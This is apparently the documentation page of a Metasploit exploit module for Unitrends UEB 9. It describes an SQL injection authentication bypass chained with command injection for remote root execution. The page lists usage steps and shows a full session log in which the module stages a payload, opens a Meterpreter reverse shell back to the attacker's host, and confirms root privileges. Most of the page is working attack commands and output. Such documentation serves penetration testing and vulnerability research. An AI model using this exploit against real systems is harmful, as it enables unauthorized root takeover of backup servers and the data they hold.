42 lines
1.4 KiB
Markdown
42 lines
1.4 KiB
Markdown
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Unitrends UEB 9 http api/storage remote root
|
||
|
|
|
||
|
|
This exploit leverages a sqli vulnerability for authentication bypass,
|
||
|
|
together with command injection for subsequent root RCE.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. ```use exploit/linux/http/ueb9_api_storage ```
|
||
|
|
2. ```set lhost [IP]```
|
||
|
|
3. ```set rhost [IP]```
|
||
|
|
4. ```exploit```
|
||
|
|
5. A meterpreter session should have been opened successfully
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### UEB 9.1 on CentOS 6.5
|
||
|
|
|
||
|
|
```
|
||
|
|
msf > use exploit/linux/http/ueb9_api_storage
|
||
|
|
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
|
||
|
|
rhost => 10.0.0.230
|
||
|
|
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
|
||
|
|
lhost => 10.0.0.141
|
||
|
|
msf exploit(ueb9_api_storage) > exploit
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||
|
|
[*] 10.0.0.230:443 - pwn'ng ueb 9....
|
||
|
|
[*] Command Stager progress - 19.83% done (164/827 bytes)
|
||
|
|
[*] Command Stager progress - 39.30% done (325/827 bytes)
|
||
|
|
[*] Command Stager progress - 57.44% done (475/827 bytes)
|
||
|
|
[*] Command Stager progress - 75.45% done (624/827 bytes)
|
||
|
|
[*] Command Stager progress - 93.35% done (772/827 bytes)
|
||
|
|
[*] Command Stager progress - 110.88% done (917/827 bytes)
|
||
|
|
[*] Sending stage (826872 bytes) to 10.0.0.230
|
||
|
|
[*] Command Stager progress - 126.72% done (1048/827 bytes)
|
||
|
|
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
|
||
|
|
|
||
|
|
meterpreter > getuid
|
||
|
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||
|
|
```
|